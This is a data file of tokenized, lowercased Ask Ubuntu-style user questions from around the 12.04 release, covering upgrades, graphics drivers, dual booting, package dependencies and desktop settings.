129759	how do you assign an icon to a specific program or window in the panel ?	i am trying to complete an icon theme and i can not seem to find out how to install custom icons . rather , there are certain windows that i can not find the icon names for . all of the others have been fairly straightforward ; just copy the icon into the icon theme folder and name it with the name of the program . but i can not get a few applications to work . specifically , skype and pidgin windows and the skype notification icon , as well as my home directories ( documents , pictures , music , etc. ) . what i want to know is what i should name the icons , or what value being used to grab these icons and how to find that value for a specific program . i am running xubuntu , if that helps .
129760	blank screen on ubuntu server startup	alright after several hours of trying i was finally able to get ubuntu server 12.04 installed . i have yet to get networking going as it was n't able to get dhcp on startup but that is a seperate issue . whenever i boot the bios screen loads , looks like it hands it off to the os and then it just sits at a blank screen . i tried ctr + alt + f1 but that did n't do anything . i figure a terminal only screen should n't have any issue displaying .
129761	how to skip to create ubuntu menu in status bar ?	when i type gvim in the terminal , i wait for ~20 seconds , then i get this error message : ** ( gvim:30499 ) : warning ** : unable to create ubuntu menu proxy : timeout was reached when i move the cursor to the top statusbar , gvim 's menubar does n't show up . it does n't matter , because i do n't use gvim menubar . but i do care about starting gvim in the terminal . how to skip to create ubuntu menu in status bar when i run a gui software ( such as gvim ) ?
129762	can not choose operating system after reinstall	i re installed ubuntu . i can not choose the operationg system at bootup . windows is installed . i can not choose ubuntu any reason ?
129763	ubuntu 12.04 i 'm trying to ugrade my geforce 8400 to geforce gtx 560 , getting a black screen	i have an nvidia geforce 8400 which is working fine in ubuntu 12.04 . i have just purchased an nvidia geforce gtx 560 and have been trying to install it . no matter what i do all i get is a black screen on boot up . i have tried ; 1/ additional drivers , driver version 295.40 , this works for the geforce 8400 but gives me a black screen with the gtx 560 when i boot . 2/ downloaded driver version 295.40 from nvidias site , was able to install it successfully , it works with my 8400 but gives me a black screen with the gtx 560 when i boot . are there any options i can try ?
129768	touchpad left-click and single tap not working	i recently bought an asus k54l and immediately installed ubuntu 11.10 along side of windows 7 . the touchpad was working in both windows and ubuntu , but after restarting a couple of times ( after updates and installations , etc . ) and all of a sudden the touchpad was stuck in the left-click mode . i checked and it 's now happening in windows , too . the only updates i was able to do before this happened were apt-get update . i decided to upgrade to 12.04 to see if that would fix it , but no such luck . i 've read a ton of stuff out there about this out there , but i ca n't seem to find anyone who is having the same problem . perhaps it 's just the hardware ? i 've never had a problem with this before , and i do n't really know how to troubleshoot . please help edit : i restarted ubuntu last night in recovery mode and ran some clean up script available from the list of options there . when i continued on through the booting process , i found that the mouse worked in this `` recovery mode . '' when i restarted again , it was broken again . i did n't try it in windows . do they share the same configuration file or something ? i would assume not . also , i found this but it 's for arch linux , and i 'm not sure if it applies to ubuntu . how should i troubleshoot this ?
129769	ubuntu 12.04 forgetting xmodmap settings often	i have the following contents in my ~/.xmodmap file . it seems a couple times a day ( without rebooting or logging out ) i need to rerun the command `` xmodmap ~/.xmodmap '' to reset my settings . the only thing i can think is that it seems to happen when i walk away from my computer for a bit . maybe it forgets the settings when the computer locks itself ? remove control = control_l remove mod1 = alt_l keycode 64 = control_l keycode 37 = alt_l add control = control_l add mod1 = alt_l anyone else seeing similar issues ?
129776	how do i fix ' running in low graphics mode ' ubuntu 12.04	brand new lemur ultra arrived this evening on my doorstep . i turned it on and followed the instructions . had n't even finished starting up then it gave the warning 'running in low graphics mode ' and goes to a screen which gives me four options ; 1 . run in low graphics mode for just one session 2 . recofigure graphics 3 . troubleshoot error 4 . exit to console login there are two options at the bottom , cancel and ok . problem is the user interface is dead . i can not execute any option . if i re-start , it just comes back o the same page . help !
129779	how to install 64bit packeges on my ubuntu 12.04 64bit ?	when i try to install 64bit packages on ubuntu 12.04 64bit , package manager says : error : can not install 'ia32-libs' and i tried to install ia32-libs but synaptic says : could not all packages for instalation or upgrade . the folowing packages was unresolvable dependencies . make sure that all repositories are added anf enabaled in the prefrences . ia32-libs-multiarch : depends : libcurl3 but it is not going to be installed ia32-libs : depends : ia32-libs-multiarch i want to install teamviewer . on 11.10 i installed 64bit teamviewer package withouth any problem .
129781	issue with gpg agent in ubuntu 12.04 after installing gnome3 shell	i just did a fresh install of ubuntu 12.04 . initially things were working . but after i installed some software , the 'gpg agent ' is unresponsive . i suspect it has something to do with upgrades that i downloaded from the gnome 3 ppa . when i try to sign a package , it terminates with : gpg : problem with the agent - disabling agent use debsign : gpg error occurred ! aborting ... . debuild : fatal error at line 1271 : running debsign failed the gpg gui tool ( called `` passwords and keys '' or seahorse ) is n't starting anymore either . when i click it , it tries to start and then gives up and dies after a couple of seconds . i am not sure where to look for log files of gpg agent . the only thing that i see in /var/log is in auth.log that says : may 1 20:04:14 jeroen-ubuntu gnome-keyring-daemon [ 1997 ] : could n't create prompt for gnupg passphrase : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.keyring.systemprompter was not provided by any .service files not sure if it is related , but when i try to start seahorse from the command line , i get : jeroen @ jeroen-ubuntu : ~ $ seahorse ( seahorse:4828 ) : glib-gio-error ** : settings schema 'org.gnome.crypto.pgp ' is not installed edit : i fixed the seahorse gui by manually downloading and reinstalling gnome-keyring version from precise instead of the ppa . however , i still can not sign packages .
129782	polly messaging menu	first , sorry for my bad english . i `` updated '' my pc from 11.10 to 12.04 ( clean install ) . after the installation of polly twitter client ( 0.93.4-0~precise1 , the latest from launchpad ) , its entries are not showing in the messaging menu as before ( in oneiric ) . its a polly problem , or there is something wrong with my system ? in any case , there is a solution to this ?
129783	10.04 lts update manager suddenly starts failing	all of a sudden my update manager is failing on my 10.04 ubuntu . it just sits forever with little process indicator spinning
129784	ca n't boot into win7 since update to 12.04	i had dual boot , win7 64bit , and ubuntu 11.10 i updated to ubuntu 12.04 now i am not met with the prompt asking which os to boot into ( setup via easybcd in windows while i had ubuntu 11.10 ) is there an easy way to get the boot manager to recognize both os 's again , or do i need to reinstall windows again and go through that headache again ? any programs similar to easybcd for ubuntu ? thanks
129786	how to search and view docs installed in usr/share/doc	a way to search and view those docs using web browser is by installing `` dwww '' but this needs apache2.2 to run in the back all the time . ( it was creating port conflicts and i could not use xampp server without removing it . ) is there any second alternative to view and search these ? can i just delete the whole `` doc '' folder ? either i want to use them or delete .
129791	colors inverted / negative in ubuntu all video files all video players not flash in youtube	when switching to 12.04 - if playing videos - any videos avi/mkv/mpg/etc in any player 8/10 times it would come up negative until launched the nvidia x server settings . now all of a sudden they are always negative and launching nvidia wo n't fix . removed and reinstalled nvidia and still no - rebooted before trying reinstall and after ... what gives ? and help ! ? !
129794	connect ftp/sftp in dolphin or transfer nautilus bookmarks	i am really liking the power of dolphin and all the kde tools that go along with using it what can i do to connect via ftp/sftp with dolphin ?
129798	compiz makes cpu run at 100 % when in suspend mode in 12.04	recently i installed ubuntu 12.04 on my laptop . and i found that when i left my laptop suspend mode , the compiz hold cpu at 100 % all the time until the laptop woke up . can anyone tell me what is happening ?
129803	upgrade from 11.10 to 12.04 stalled	i 've been trying to upgrade from 11.10 to 12.04 using the update manager . everything went fine at first , and i have n't gotten any errors , but the progress has been stopped at `` preparing to configure debconf '' for about 24 hours now . is there anything i should do about this or a way to stop the upgrade ?
129804	can i annotate the screen in gnome shell ?	anyone know a plugin or application that emulate the compiz annotate funcionality in gnome 3 ? annotate is the plugin that lets you draw on the screen .
129809	acrobat reader in 12.04 64bit version	i have recently installed ubuntu 12.04 lts ( amd64 bit version ) on my laptop . after installing the adberdr9.5.1-1_i386linux_enu.deb file using ubuntu software center , when i tried to open pdf files , it did n't open at all . even when i open a pdf file in firefox , there is no response . can someone help me to install the acrobat reader correctly ?
129815	emacs detaching from launcher	i have just upgraded to ubuntu 12.04 and i am having an issue with emacs and the unity launcher . when i start up emacs from the launcher it opens a new window but the typical little arrows do not appear on either side of the emacs icon . when i minimize the emacs window clicking the unity icon does not maximize it , it opens a new window instead . so once i have minimized emacs there is no way to retrieve my current session . any ideas on what might be causing this ? thanks .
129820	how to change the default desktop icon size ?	how to change the size of desktop icons ? i tried gconf-editor as given at how to change desktop icon size ? . i am not getting the option for changing size at app > nautilus > icon_view . i am using ubuntu 11.10 . kindly help me in changing default icon size . i want to make them small .
129822	how to change the order of scopes in a lens ?	i recently installed 12.04 , and have started to to fiddle around with lenses . i 've installed two scopes for the music lens : spotify and grooveshark . it seems to me that the current scope display order is the alphabetical order of the scope names ? when doing a search , the grooveshark hits are always presented above spotify 's . is it possible to sort/order/prioritize the presentation of scopes in some way ?
129828	virtualbox unresponsive after a forced power down	i have trouble in virtualbox on ubuntu 12.04 32bit . this app does not run after emergency switching off of the computer . see screenshot , virtualbox remains in this condition .
129830	what does changing the default aplications list do ?	there is a list of default applications in system configuration > details . i changed the default video application from the movie player totem to vlc media player , but i ca n't see any change or effect of this . for example , .avi files are still being launched with the default movie player `` totem '' . of course , i can change this by right clicking the file , going to properties > open with > and setting vlc media player as my new default application to open that type of files . but , do i need to do this for all the video file formats in my pc ? i was expecting the default application list to do this for me .
129832	why do n't i see an option to upgrade to 12.04 lts ?	looking to upgrade 11.10 to 12.04 , update manager does n't display the install button after fully updating everything available . should i download to cd/usb and install from there or is there a fix ? i am running a dual-boot system ( windows 7 on the other half ) , 32-bit acer machine .
129839	wired network ( eth0 ) disappears on a lenovo z570	i upgraded from ubuntu 11.10 to 12.04 yesterday . i am running a bsnl broadband dsl conenction . the wired network suddenly dissapears and the computer stops detecting the ethernet card after sometime . however , after rebooting , it again becomes alright . $ lspci | grep ethernet 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) specs : lenovo ideapad z570 intel i5 2nd gen. processor 3 gb ram
129846	new installation of 12.04 unable to find autorun	i have windows 7 and had a dual boot with wubi . i recently installed backtrack 5 on my hard drive and in doing so messed up my ubuntu 11.10 , so i downloaded the new ubuntu 12.04 and burned the image to a cd . when i restart to the cd/dvd drive the grub loader comes up and not the ubuntu install . i have checked the contents of the image and all the files seem to be in order . when i try to run from command in bt5r2 its unable to find autorun . so i burned another disc and have the same problem . it 's unable to locate autorun and it wont autorun from restart and my bios is correct . i even tried from usb and got 'unable to find os ' . i do n't have a windows 7 install disc . i am looking to do a full install of ubuntu 12.04 . any help would be appreciated .
129852	persistent accidental icons on gnome ( fallback ) top panel	i accidentally dragged ( twice ) the `` shut down '' icon onto the top bar , and am not managing to get of them . i already tried : 1. pressing alt or alt+win and right clicked them ( nothing happens ) 2. dragging them onto the desktop ( they bounce right back ) 3. dragging them directly into the trash bin ( they bounce back ) 4. downloading the gnome tweak tool ( found no helpful option there ) . are there any other options ? any help will be greatly appreciated . p.s . i am working on ubuntu 11.10 with gnome fallback .
129853	windows 7 dual boot ubuntu . install . reinstall .	i have a dual boot win 7 with ubuntu . now , win 7 got some problem . not loading . ubuntu is working . but in system information it shows that it is ubuntu 64 bit . but i do n't have a 64 bit system . i have 32 bit . so , i want to uninstall it and reinstall 32 bit ubuntu . i have no idea how can i do that . can anyone help ? thanks .
129854	what downloaders are available for downloading large ( over 1 gb ) files part by part ?	i have tried several downloaders but none of them work for large files ( over 1 gb ) - the problem is i have only 30 kbps connection and therefore i need to download a file ( over 1gb ) part by part . i want a perfect alternative of orbit downloader or internet download manager of windows . which downloader would you recommend : jdownloader multiget fatrat
129862	ubuntu ami with swap for micro instance	the default ubuntu ami does not have swap enabled , but it is not suitable for production use as the machine just crash when it is out of memory . are there existing images with swap enabled so i can use without create a custom image ? thanks .
129863	how can i resize the system settings window ?	having installed myunity , it also shows up as an entry in the system settings dialog . however , the system settings window does not adapt to it . now i have to scroll down to see the bottom entries , because the system settings window is not resizable , nor can it be maximized . is this a bug ? there 's still plenty of space on my screen . so why scroll down ? is there a way to make this window resizable/maximizable or adapt to the number of entries ? see image : note : i have disabled overlay scrollbars . but that has nothing to do with it . it also does n't work with overlay scrollbars enabled .
129866	upgrade 12.04 lts from 11.04 , keyboard freeze and monitor can not light up	my pc is dell optiplex 380 , the original os is ubuntu 11.04 , and i upgraded it to 12.04 right now . after reboot , the keyboard is freezed , and monitor can not light up . seems video card driver is incorrect and usb port is not working . please help me , it has very important data in it ... ...
129869	`` mapilogonprovider : network error '' with exchange mapi connector	using ubuntu 12.04 , and exchange mapi plugin for evolution . i have specified the server as an ip address ( as found with google ) however when i try and authenticate i get : '' mapilogonprovider : network error '' how can i fix the problem ? thanks
129878	cant install ubuntu 12.04 on my x86 pc	i tried to install ubuntu 12.04 but it said that you need the required kernal to install ubuntu 12.04. so unable to boot . so please help me to install it on my x86 pc ( amd processor with windows vista installed . )
129879	my top menu consists of two bluetooth but no battery indicator	it looks as figure above . i right-click on the blank of topbar , but no any menu or configuration appears . in system settings - > power , i have turned 'show battery status on menu bar ' on ( 'when battery presents ) . but nothing happens .
129883	ubuntu 12.04 w/unity - mouse lag	dell latitude-e6500 3.2.0-24-generic # 37-ubuntu smp x86_64 x86_64 gnu/linux graphics chip : quadro nvs 160m driver - 295.40 here is my problem . my mouse lags in ubuntu . it is always a few ms `` late '' , and often not completely on target either . it is system-wide , not only when scrolling on web pages . the hw i am using is the same i used when running kubuntu 11.10 , which performed light years better compared to unity - and , with no mouse lag what so ever . i am aware of the bug with the current nvidia driver ( 295.40 ) , but it is the same with the noveau driver as well . it has nothing to do with setting the acceleration and sensitivity levels . it is the actual input that seems weird . it is the same on a single laptop monitor and on my dual monitor setup . can it be kernel thing ? did they change how mousepolling is done ? any compiz tweaks available ? i plan to test this with kubuntu 12.04 to see if it happens with kwin too . thanks .
129885	how could unity2d save sessions ?	until 11.10 i used kubuntu . for some annoying reasons i migrated to ubuntu from 12.04 . now i really miss some kde features and i do n't have found solution yet . first big problem : i work with lot of windows ( > 20 ) and i set them on different workplaces . i avoid restarting computer , but sometimes it is neccessary . and then is so tedious to set my workspace up again . is there some cure for that ? i read already some sources : save unity desktop session and https : //bugs.launchpad.net/ubuntu/+source/gnome-session/+bug/771896 and https : //lists.ubuntu.com/archives/ubuntu-desktop/2011-january/002734.html . is there some change in 12.04 ? what is the meaning of workplaces , when you need to set them up every time after login ?
129887	where is wine-1.5 installed ?	i installed wine-1.5 with these commands in the terminal > > sudo add-apt-repository ppa : ubuntu-wine/ppa sudo apt-get update sudo apt-get install wine1.5 after it downloaded some files , it got installed and i closed the terminal ... but what the problem is that > i can not find the wine icon for the application anywhere . i went to 'ubuntu software center ' and looked through installed files and it was n't there : / ? . so i 've decided to download it via 'ubuntu software center ' but can anyone tell me how to delete the files it downloaded using terminal cause it turns out to be a waste of space for my pc .
129888	crash during 12.04 upgrade , `` broken pipe '' , can not boot	now when i switch on the computer , only black screen with the following message shows up : '' could not write byte : broken pipe '' ... .. starting network connection stopping network connection ( the above phrases repeat many times ) also something like : stopping system v runlevel i can not type on the screen . it does n't proceed onto anything . just hanging there . please help ! if there 's anything i can do to enter and get my files . thank you !
129891	is there an alternative to dvd-shrink , that can compress a dvd image to a smaller size to fit on a writeable dvd ?	is there a linux alternative to the windows application dvd-shrink , that can compress a dvd image to a smaller size to fit on a writeable dvd ? in backing up some dvd 's the ripped iso file size is over 7000mb is there an alternative linux software , similar to windows `` dvd shrink '' that can compress this to fit on a writeable dvd which is about 4000mb
129897	how to migrate passwords from kwallet to the gnome keyring ?	i migrated from kde to unity desktop . so all my passwords i used with chromium and iron-browsers are stucked in kwallet . how to access passwords from kwallet inside unity ? maybe there is way that browsers could use still kwallet ? or some way for migration ? i use now ubuntu 12.04 , kwallet was in kubuntu 11.10 . edit . results so far : i tried to use kwallet under unity2d , but if chrome/iron does not ask directly from kwallet ( and it does not , it uses seahorse under unity2d ) , the data saved to kwallet from chrome/iron is useless . i exported from kwallet as xml and tried to load it to keypassx , but result is same , because chrome/iron data is unreachable . when i look data through the kwallet , there is said : `` this is binary entry . it can not be edited as its format is unknown and application specific '' . only way i see , is to install kde somewhere and try export data from chrome/iron directly , but i still hope to have better solution .
129901	how to install ubuntu 12.04 with pendrivelinux ?	what are the steps to install ubuntu 12.04 with pendrivelinux , universal usb installer exactly ?
129906	making the old encrypted /home partition ( 10.10 ) available to new install ( 12.04 )	i installed ubuntu 12.04 on a fresh partition and my old ubuntu 10.10 has my home directory encrypted . i was wondering if i can mount this home directory as /home/myoldhome in to new install whenever i use it in rw mode . i already referred trying to mount old encrypted home and was able to use ecryptfs-recover-private utility to mount my home directory to /tmp/ecryptfs.xxxx . but this would not help me to access the data in r/w mode and to mount in subsequent boots to 12.04 automatically . moving the data to new home directory is not an option since i do not have enough hard disk space in the new partition . by following , the answer 1 from rausch , i could mount the filesystem , but all the files/directories are shown as ecryptfs_fnek_encrypted.xxxx.xxxx . so is it possible to mount the encrypted home directory in read/write mode and make an entry to /etc/fstab to automatically mount it every time i boot in to 12.04 ?
129921	gwibber twitter `` authorise '' button does nothing when clicked	i 've had this issue since 11.10 , the authorise button literally does nothing when pressed in gwibber so i ca n't add an account or anything . i am behind a proxy so i fear this may be an issue ? i see no options to edit a proxy specifically in gwibber , everything else is set up with the proxy and works fine ( firefox , pidgin etc )
129933	running uck causes zenity crashed	i was very satisfied with ubuntu customization kit on ubuntu previous versions but with 12.04 , it leads to crash zenity and disappear the gui and nothing occur.i tried the old version of this package but the same result.please help me.thnx in advance .
129941	my ubuntu 12.04 has no xorg.conf is that normal ?	i have a problem with dual monitor that i posted in bugs here https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/992778 but i noticed my ubuntu 12.04 has no xorg.conf is that normal ? there is just a directory called xorg.conf.d /usr/share/x11/xorg.conf.d /usr/share/x11/xorg.conf.d/10-evdev.conf /usr/share/x11/xorg.conf.d/11-evdev-quirks.conf /usr/share/x11/xorg.conf.d/11-evdev-trackpoint.conf /usr/share/x11/xorg.conf.d/50-synaptics.conf /usr/share/x11/xorg.conf.d/50-vmmouse.conf /usr/share/x11/xorg.conf.d/50-wacom.conf /usr/share/x11/xorg.conf.d/51-synaptics-quirks.conf /usr/share/man/man5/xorg.conf.5.gz /usr/share/man/man5/xorg.conf.d.5.gz has ubuntu 12.04 got ridden of xorg.conf or it is a error only with me ?
129942	installing packages from ubuntu cd	i 'm having some problems installing packages off the cd . the ubuntu server is installed in a small local network with a dns but no internet connection . when i try installing a package , i.e . lamp or vsftpd it just tries to resolve the name of the update server . after some tries it gives up instead of checking the cd . i 've added the cd using sudo apt-cdrom add . i 've also tried using tasksel , which opens aptitude , without any luck . how do i install packages ( lamp , ssh , ftp , dhcp , samba ) off the cd without internet connection ? edit : since this was unclear : we 're given a server with ubuntu server installed and we 're supposed to install lamp , ssh , ftp , dhcp and samba on it . to ensure we are n't cheating ( asking the internet for help during the contest ) we are limited to using only the cd .
129950	is it faster to upgrade to ubuntu 12.04 from ubuntu 11.10 with update manager ?	i have limited internet and was wondering if it uses less bandwidth to upgrade to 12.04 through update manager or if it is the same dowload size as an iso image downloaded from the website . which would use the least amount of internet ?
129951	super + w shows windows from current workspace only	after upgrading from 11.10 to 12.04 pressing super + w shows the windows from the current workspace only and not from all workspaces . how can i make unity to show again all windows from all workspaces when pressing super + w ?
129952	java packaging and uploading to a ppa in launchpad	i have a java application ( created as a class ) and i want to know how i can ( or should i even ) convert it to .deb format and then how to upload it to a launchpad ppa so that everyone could install it ? notice that i am still learning java , so my program does not have any gui .
129960	how can i upgrade a package without removing its dependencies ?	for some reason ( having used xorg-edgers in the past might be part of that ) , i still have a very old x server installed : xorg 7.6+7ubuntu7.1 xserver-xorg-core 1.10.4-1ubuntu4.2 xserver-xorg-video-intel 2.16.0+git20111011.823a4272-0ubuntu0sarvatt~natty when i try dist-upgrade , aptitude wants to remove 255 packages first ( acrobat , bluez-alsa , ... , ia32-libs , ... , xserver-xorg-video-* to name a few ) is there a way to update packages forcing ubuntu to ignore any dependencies it might think that could theoretically be violated ? on a rpm-based system , i 'd use rpm -- force -- nodeps note : i already removed the xorg-edgers ppa . note 2 : i 'm trying to upgrade with aptitude safe-upgrade and aptitude dist-upgrade
129962	ps -ef vs ps aux	what is the difference between ps -ef | grep thin and ps aux | grep thin as per the output there is a variation but i 'm not clear what are the things being listed .
129964	resuming an upgrade to 12.04 which got stuck on reconfiguring dropbox	i was upgrading from 11.10 to 12.04 and the process got stuck when reconfiguring/downloading dropbox . i had to break the upgrade at 87 % and do n't think my system will boot now . is there any way to resume the upgrade in order to complete it ?
129965	how to set iron as default web browser in unity2d ?	i use iron as my default browser , but in unity i did not found the place , where i could set it as default for my user . in system settings is preferred applications , but in list of web browsers is just firefox ( but my iron is installed through te package manager ) . how to add iron to this list ? so i searched a while , but did still not found the solution . in this posting i saw good idea how to set default browser system-wide , but again , iron was n't in the list of available browsers . so , how to make iron default browser in unity ( 2d ) ? desirably user-based way , not system wide .
129967	how can i resume an upgrade after denying it the first time ?	last evening i started the procedure to upgrade ubuntu 11.10 to 12.04 while not being at home and with a slow connection . during the upgrade procedure ubuntu told me that the required time with my connection was very long . because of lack of time i decided to deny the upgrade and start it today , but today i ca n't find how to start it again because the upgrade button is not anymore visible ! what can i do to upgrade ubuntu without downloading the iso ? is there any terminal command that allow me to start the upgrade ?
129968	ubuntu 12.04 ( 64 bit ) ultra laggy unity-3d with 295.33 and 295.40 drivers on pre g80 series nvidia quadro 3450 card : guest session seems un-affected	before someone marks this question as duplicate : i have tried the common fix for this problem by installing the 295.33 series driver as suggested elsewhere . i have also removed my compiz-1 settings and .compiz-1 and .compiz and started afresh . despite all this unity 3d works snappily only in the guest-session . in my regular session , the performance is terribly slow . window dont erase..moving the terminal around gets hundreds of ghosted windows . the guest-session on the same machine has seemingly flawless unity performance ( it was so good i check by echo $ desktop_session and it was indeed unity 3d ) . what in my setup is causing slow laggy performance as the non-guest user ? just deleting the .config/compiz and .config/compiz-1 and ~/.compiz and ~/.compiz-1 settings doesnt seem to sort out my compiz settings and give me guest session like performance .
129969	how can i install python 2.7 x64 in x64 wine on 12.04 ?	it keeps failing when i run wine msiexec /i python-2.7.2.amd64.msi /qn as recommended as a workaround for an installer bug in some google results . i just wanted to help the next guy that encounters this .
129972	how can i reinstall xrandr without serious disruption to 12.04 ?	this is the sequence that leads to xrandr going missing : installed 12.04 on a system with a motherboard using the intel g45 chipset and the e8400 core 2 duo and amd radeon hd 5450 video card . installed fglrx when ubuntu prompted via additional drivers . ran catalyst ( administrative ) to select multi-desktop and rebooted . ran catalyst ( administrative ) to select xinerama and rebooted . answer yes to about 3 prompts that request to send bug reports to ubuntu . at this point settings > appearances no longer offers the widget that allows you to resize the unity launcher icons . also settings > displays says randr extension is not present . btw : this same sequence is repeatable , including the issues with the missing icon resizer and xrandr , so there is clearly bug fixing potential here . how can i get xrandr reinstalled without un-installing a large set of dependencies ? i realize that if i un-install xrandr i will have the chance to re-install but the number of dependencies is large and so an un-install will cause many systems to be un-installed and i am afraid that will ruin ubuntu 12.04 . hence , i 'm looking for a more direct fix . i thought rebooting the .iso disk and reinstalling would be a good fix but obviously not since this problem is repeatable .
129980	how to report a bug in a program that does not know the name ?	every time i start ubuntu i get a report that some program crashed but it does not show me which are they . how can i know which program is causing the problem . the dialog box has the text `` a program crashed '' . option -- cancel -- -report bug .
129985	how to make the date appear next to the time indicator in gnome classic ?	i 'm using gnome classic in ubuntu 12.04 and i 'm not able to find the settings that would allow me to display the date and day along with time in the clock of my indicator applet . any idea how i can make the date and day appear along with the time ? when i click on the clock and then click on `` time and date settings '' , i get the `` system settings '' . from there when i click on `` date and time '' , i get a setting where i can just edit the date and time . i 'm using 12.04 with gnome classic . i removed unity .
129988	connecting to projector in ubuntu 12.04	i tried to connect my new ubuntu version with a projector.but it was useless cause laptop not identified that projector.updated my nvidia driver also.i installed disper also.but could n't connect to it.any solutions ? ?
129991	undeleting with ntfsundelete	trying to undelete some files using ntfsundelete : sudo ntfsundelete /dev/sda1 -v -s 300m-20g -p 100 -o /mnt/bigboy/ntfsundelete/ but i am getting : you must specify exactly one device . as far as i can see , i am specifying the device i want to restore files from , and the location of the files . what am i getting wrong ?
129994	ca n't install totem on 12.04	after upgrading to 12.04 , not only has totem been uninstalled against my will and without my notice , but i can not install it . when i try to install it through the commandline , i get the following output : $ sudo apt-get install totem [ sudo ] password for < user > : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : totem : depends : totem-common ( = 3.0.1-0ubuntu21 ) but 3.2.2-0ubuntu1~oneiric1 is to be installed recommends : totem-plugins but it is not going to be installed recommends : totem-mozilla but it is not going to be installed e : unable to correct problems , you have held broken packages . how can i fix this problem ? as far as i can tell , i had no errors during the upgrade . comment suggestions please post your suggestions as answers so i can give them followup individually . harisibrahimkv $ sudo apt-get install -f [ sudo ] password for < user > : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . aking1012 sudo apt-get update fetches all the data and gives no errors . $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . repeating the 3 commands above yields no different results . $ dpkg-query -w totem-common totem-common3.0.1-0ubuntu21 totem-common 3.2.2-0ubuntu1~oneiric1 no packages found matching totem-common3.0.1-0ubuntu21 .
129996	how to set volume control using a mouse shortcut ?	i used to be able to use btnx in ubuntu 11.10 to do this , but now i ca n't find the software from the software centre . can anyone help me with this ?
129997	12.04 freezing , no mouse control , and desktop freezes when laptop is on battery power	i just installed ubuntu 12.04 on my laptop ( aspire one ao522 ) and when it boots when it is not hardwired into my network , the harddrive appears to shutdown and ubuntu just freezes . the display stays the same , but i am unable to move the mouse or click on anything . any suggestions ? i think it might be the wireless driver , but i 'm no expert .
130000	how do i automatically install repast on ubuntu 12.04 ?	how can i install repast on ubuntu 12.04 ? i installed eclipse from the repos , but i could n't then install repast . according to the site , repast needs eclipse helios classic , while the repo version of eclipse is indigo . what is the easiest way to get repast working ? that is , i know i could install things myself from the eclipse website . but i do n't want to do that : is n't the point of having a package manager that you should n't have to do that sort of thing ? to be clear , i 'd like to install as much as possible through the package manager .
130004	how i do set xcowsay on login without the cow disappearing ?	i love xcowsay app . and i want that it starts on logon . i added to startup manager this command : xcowsay hi . but after login , the cow does n't show , only the speech bubble . although , when i type it on terminal runs good . i do n't know if it 's because command , startup order or user permission . all startup applications with commands runs well . i have ubuntu 12.04 lts and xcowsay version 1.2.0 .
130010	live cd boot/installation problem , blank screen - 12.04	i 'm trying to install ubuntu-12.04-desktop-amd64 from my usb stick . when booting from usb i instantly get a blank screen ( with a grey box at the left bottom ) i checked the live system with my laptop.works well except it also starts of with a black screen and a grey box at the bottom . i figure the problem is my geforce gtx 570 since older versions of ubuntu where only able to boot with xforcevesa and nomodeset . unfortunately i ca n't change the boot parameters . i tried the alternate version for a text based install , but it has the same problem . if i press esc in the alternate i get a message box with two buttons but no text . i would be happy for any advice on this matter
130011	how to permute various icons in indicator-applet ?	i 'm using gnome classic in ubuntu 12.04 . i can only move the indicator applet as a whole . as in , i can not individually change the positions of the battery icon , bluetooth , network-manager , date and time , etc . is there an option to individually move each of these icons ?
130012	configuration of ubuntu to my computer	i am trying to load ubuntu onto my computer from a usb disc drive and the error message i 'm receiving is : no configuration file found . how do i fix this . any help is greatly appreciated .
130017	how do i configure lightdm to run seamlessly ?	my unity greeter/lightdm is working fine in precise with one exception . when the greeter first displays the default system wallpaper /usr/share/backgrounds/warty-final-ubuntu.png is visible for 1 second , before dynamic lightdm kicks in . its more of a nuisense than anything , but what options do i have to configure this to make it run seamlessly ? i have looked at other related au q & a and uf with no success and i have reviewed the configuration at gksu gedit /etc/lightdm/unity-greeter.conf
130020	image manipulation through a local proxy	i would like to run commands on images before they come to my browser . for example , i would like to compute the md5 of the image , then decide whether i should pass it unmodified , pipe it through an image filter ( blur it for example ) , or totally replace it with an image of the same dimensions ( for example.. a cat ) . i have found a program called webcleaner but it does not seem to be maintained ( since 2006 ) anymore ; it can be compiled under ubuntu 12.04 using a patch but it 's using runit http : //smarden.org/runit/index.html and i ca n't find how to start it .
130021	install ubuntu linux directly onto hard drive via a bridge	the windows xp 32-bit on my laptop recently died and i want to install linux now . the problem is the laptop has no cd or floppy drive anymore and is not able to boot from usb . i borrowed a `` bridge '' from a friend , which allows me to connect the hard drive to the usb-port of my other laptop ( win 7 64bit ) which then recognizes it as a hard drive . how can i get a bootable os on this hard drive ? i have tried installing it the usual way and just select the other hard drive , but my other laptop wo n't open the 32bit installer . but i need a 32bit os for my old laptop
130026	eclipse is invisible in system tray	i just installed eclipse , but i got a problem , after i minimize the eclipse than it 's not visible on system tray . i also check the alt+tab but there also is n't visible . i had to kill the process and restart . how can i fix this ?
130031	ca n't change the dash color	i try to change the dash color from ccsm or myunity but i after i choose a color it changes to the default by it self in 2-3 seconds . using unity 5.12.0
130032	wxpython 2.8 offline installation on ubuntu 9.10 with 2 version of python	how do you do an offline installation of wx 2.8.12 for python2.7 on ubuntu with python 2.6 as default python ? tried searching on google but ca n't found anything specific . i 'm a noob with linux . thanks is advance
130038	machine froze during upgrade to 12.04	i tried upgrading from 11.10 to 12.04 . it got to the point of installing packages then i stepped away . when i got back the screen was black ( possibly due to the screen saver ) . i left it for about 8 hours and there was no change . i then power-cycled and now it wo n't boot to a login screen . i tried hitting < esc > repeatedly while powering up ( to get to the grub menu ) but that has no effect . what should i do now ? edit : i can see the files on the hard disk once i boot from a live cd . i saw some stuff online about using chroot and dpkg to continue an aborted upgrade from the command line . is there any comprehensive guide on this ?
